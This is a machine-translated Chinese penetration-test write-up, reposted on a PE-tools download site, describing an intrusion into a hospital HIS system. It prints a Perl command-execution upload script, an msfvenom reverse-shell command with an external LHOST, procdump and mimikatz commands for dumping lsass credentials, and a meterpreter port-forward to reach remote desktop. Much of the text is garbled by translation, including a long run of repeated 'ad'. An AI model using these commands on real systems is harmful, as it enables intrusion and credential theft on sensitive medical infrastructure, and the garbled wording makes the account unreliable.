U盘PE| w764位旗舰版下载 | U盘装win7系统 | U盘启动 |win7pe | win10下载 |加入收藏土豆PE官网U盘PE,U盘装win7系统,win7pe,U盘启动,U盘装系统,w764位旗舰版下载站!
当前位置:主页 > 新闻资讯 >

【实战分享】记一次对某医院HIS系统的渗透测试

来源:http://www.tudoupe.com时间:2022-05-10

山东新潮信息

专业人员优先注重质量和安全。

原文来自Tide安全小组,转载了该声明。 ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad adadadadadadadadadadadadadad adadadadadadadad ad adadadad adadadadadad adadadadadadadadadadadadadadadadadadadadadadad adadadadadadadadadadadadad adadadad ad ad ad adad ad ad ad ad ad ad adadadadadadad adadadadadadadadadadadadadadadadadadadadadadadadadadadadadad adadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadad

信息收集

IP:202.194.xx.xxx

开放82端口。

这叫XAMP,我们把目录擦掉,也许我会碰到phpmyadmin

可悲的是 phpmyadmin被封锁了403天

有某种东西, 和他的系统相似。

我不知道,His. db是一个数据库文件, 而His.tar是他的系统文件的备份。

他的是一种可以下载和阅读的普通语言。

使用 SQLite 数据库 。

它正在 Windows 7 上运行。

文件上传

无法删除文件夹“{0}”。

在放弃之前进行了多次登入尝试。

直接搜索上传关键字以发现文件是否已上传 。

没有办法提交未经授权的文件,也没有筛查。

XAMP 软件包可能被用来支持 php 语言。 令人难以置信的是, php 文件的上传尚未解决 。

在下载的自定义代码中没有修改皮肤的机制, 所以我将用一种不理解 perl 的语言执行系统命令 。

源码为:

#!"D:Strawberryperlbinperl"

# 用于集中收集文件的上传程序。

print "Content-type: text/htmlnn";

$files_print = `whoami`;

print " $files_print ";

然而,上传它非常耗费时间。

想要使用由 msfvenom 直接创建的 perl 马并从命令行访问它。 但是, 在访问后, 服务器返回500 个错误 。

msfvenom -p cmd/unix/reverse_perl LHOST=144.xxx.xxx.xxx LPORT=2333 -f raw > shell.pl

最后,一个大型男子的游马 被发现在刺上, 并且可以正确表现。

perl大马

当您在网上时,您可以使用 msf 马来连接到3389港的内联网。

在整个查看过程中发现了若干保障措施,增加用户是不可行的。

这还是老办法 Prodump+mimikatz是一个很好的变通方法

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Mimikatz可以用来在当地阅读。

该系统有72个,是浪费时间。

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

好,有密码,只要等待登入

msf上线

安装后,将删除和成功张贴在网上的操作员。

3396 远程桌面已转发端口 。

portfwd add -l 3396 -r 192.168.0.6 -p 3396

当您登录时, Windows 会远程连接 。 “ 此会话由于数据加密问题而结束 。 请重新连接到远程机器 。 ” 更改 Kali 的 rdesktop 命令将会解决这个问题 。

E

N

D

Copyright © 2012-2014 Www.tudoupe.Com. 土豆启动 版权所有 意见建议:tdsky@tudoupe.com

土豆系统,土豆PE,win7系统下载,win7 64位旗舰版下载,u盘启动,u盘装系统,win10下载,win10正式版下载,win10 RTM正式版下载,win8下载,电脑蓝屏,IE11修复,网络受限,4K对齐,双系统,隐藏分区,系统安装不了,U盘装系统,笔记本装系统,台式机装系统,diskgenius运用,GHSOT装系统,U盘修复,U盘技巧,U盘速度,U盘不能格式化,U盘复制发生错误,U盘加密,U盘选购,开机黑屏,蓝屏,进不了系统,上不了网,打不开程序,点击无反应,系统设置,PE个性化,PE添加网络,PE维护系统

点击这里给我发消息